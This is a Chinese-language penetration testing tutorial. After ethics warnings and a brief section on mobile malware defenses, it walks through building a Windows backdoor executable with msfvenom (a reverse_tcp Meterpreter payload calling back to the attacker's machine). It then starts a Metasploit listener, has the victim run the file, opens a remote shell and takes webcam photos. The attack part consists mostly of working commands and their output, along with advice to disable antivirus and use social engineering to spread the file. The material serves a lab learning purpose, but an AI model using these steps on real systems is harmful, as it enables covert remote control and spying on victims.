MSF恶意程序利用【实战】

★关于道德伦理的忠告★

关于一些网络安全实战内容，我还是不厌其烦的写上这些忠告，请见谅。

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者，我们可以击败安全防御机制，但这是仅仅是我们工作的一部分。当你进行渗透攻击时，请记住如下的忠告：

• 不要进行恶意的攻击；

• 不要做傻事；

• 在没有获得书面授权时，不要攻击任何目标；

• 考虑你的行为将会带来的后果；

• 如果你干了些非法的事情，天网恢恢疏而不漏，你总会被抓到牢里的。

1、手机恶意应用程序分析

1.1、手机恶意应用程序理解

手机恶意应用程序：一般是指在用户不完全知情和认可（它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等）的情况下强行安装到用户手机中，或者一旦安装就无法正常卸载和删除，但又具备一定正常功能的软件程序。它是介于病毒和正常软件之间的软件，它与病毒的区别是：一般还具备一定的正常功能。

1.2、危害性

恶意程序中植入的木马程序 ，可在用户不知情的情况下 ，收集用户个人隐私信息、恶意扣费 。

1.3、如何实现？

很多APP由于存在大量安全漏洞和缺乏安全措施，被不法分子二次打包后，或被直接仿冒，或植入广告、恶意代码，甚至加入违法内容，重新投放应用市场，严重危害用户隐私与财产安全，网络“黑产”链条也开始滋生 。

1.4、“官方”八招对付

八招对付恶意软件【来源于人民日报】：

1、选择官方渠道下载

2、关注流量使用

3、谨慎ROOT

4、注意权限信息

5、安装防病毒软件

6、不要在未知安全性的WIFI网络中上网

7、及时止损

8、及时举报

2、MSF恶意程序利用

2.0、说明

因为手机恶意程序利用的实验，我自己没有验证过就暂不做分享，以win7实验做为示例。

2.1、制作window恶意获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径，进而达到更好的防护，而不是利用技巧去做攻击等不合理的行为 。

思路：利用社会工程学中人的心理，为某些软件利用msf生成一些后门程序，进而通过带有后门的软件实现渗透获取shell 。

2.1.1、简介

msfvenom是一个Metasploit独立的有效负载生成器，也是msfpayload和msfencode的替代品。是用来生成后门的软件。

实验内容：
制作Windows恶意软件获取shell，msfvenom的shell在windows中的使用 msfvenom生成shell.exe

2.1.2、实验步骤

2.1.2.1、实验环境

kali-linux系统，版本：Linux kali 5.10.0-kali9-amd64，IP：192.168.242.4

win7系统，IP：192.168.242.6

2.1.2.2、生成后门软件

在kali系统生成后门软件，然后先复制到外面(本机)，再复制到目标系统win7

msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口，只要不占用即可 -f 输出文件格式 > 目标文件的名称

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe

注意：该步骤自己电脑的杀毒软件和防火墙需要暂时关闭，如果不想关闭的话，可以利用ms17-010漏洞上传文件到win7电脑，可以参考我前面写的《渗透测试实战-漏洞利用MS17-010》

2.1.2.3、启动侦听

在kali系统操作

# 启动metaspliot
msfconsole

# 启动成功结果--每次的图案不一样，主要关注下面的是否有msf6>  即表示成功
Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

# metasploit设置侦听 加载模块
msf6 > use exploit/multi/handler

# 引用成功结果 ，再在后面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 

# 设置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

#设置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip

#设置kali的端口lport =6060，也就是生成后门的端口
msf6 exploit(multi/handler) > set lport 6060

#执行
msf6 exploit(multi/handler) > exploit 或者 run

# 结果
[*] Started reverse TCP handler on 192.168.242.4:6060 

2.1.2.4、win7系统双击后门软件

win7系统双击后门软件，然后观察kali系统会看到有对应信息串联起来，效果如下

[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400

2.1.2.4、操作命令控制win7系统

# 输入命令行
meterpreter > shell

# 连接成功
Process 8856 created.
Channel 1 created.

# 退出当前操作
exit

# 可进行拍照，只要目标系统有拍照功能
# 查看摄像头
meterpreter > webcam_list
# 结果表示有
1: Integrated Camera

# 通过摄像头拍照
meterpreter > webcam_snap